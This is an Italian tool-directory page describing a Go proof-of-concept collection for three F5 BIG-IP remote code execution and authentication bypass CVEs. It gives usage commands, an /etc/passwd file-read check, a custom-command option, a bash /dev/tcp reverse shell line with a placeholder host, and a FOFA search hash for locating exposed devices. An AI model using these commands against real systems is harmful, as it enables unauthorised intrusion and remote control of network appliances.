Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
F5-BIG-IP-POC — CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 Raccolta di POC | Kitploit
Strumenti/GitHubGitHub/west9b/f5-big-ip-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubwest9b/f5-big-ip-poc

F5-BIG-IP-POC

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 Raccolta di POC

Vedi Repository
1024 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

F5-BIG-IP POC

Scritto in Go, collezione di POC per CVE-2020-5902 CVE-2021-22986 CVE-2022-1388. In futuro verranno aggiunti altri POC per F5.

author:160team.west9B

Da utilizzare solo da ricercatori di sicurezza autorizzati, nel rispetto delle leggi sulla sicurezza informatica. Qualsiasi problema o conseguenza è sotto la vostra responsabilità, l'autore non è responsabile.

01-Introduzione di base

Collezione di POC F5:

  • CVE-2020-5902: Vulnerabilità di esecuzione remota di codice su F5 BIG-IP
  • CVE-2021-22986: Vulnerabilità di esecuzione remota di comandi non autorizzata su F5 BIG-IP iControl REST
  • CVE-2022-1388: Bypass dell'autenticazione per esecuzione remota di comandi

02-Istruzioni per l'uso

utilizzo: ./F5-BIG-IP -u url

CVE-2020-5902: la verifica utilizza il download arbitrario di file. Se viene restituito /etc/passwd, la vulnerabilità è presente.

CVE-2021-22986, CVE-2022-1388: il POC esegue di default il comando id. Se viene restituito {id}, la vulnerabilità è presente. È possibile utilizzare -c per comandi personalizzati.

Reverse shell

usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

Screenshots

Image text Image text

fofa

icon_hash="-335242539"

Scarica lo strumento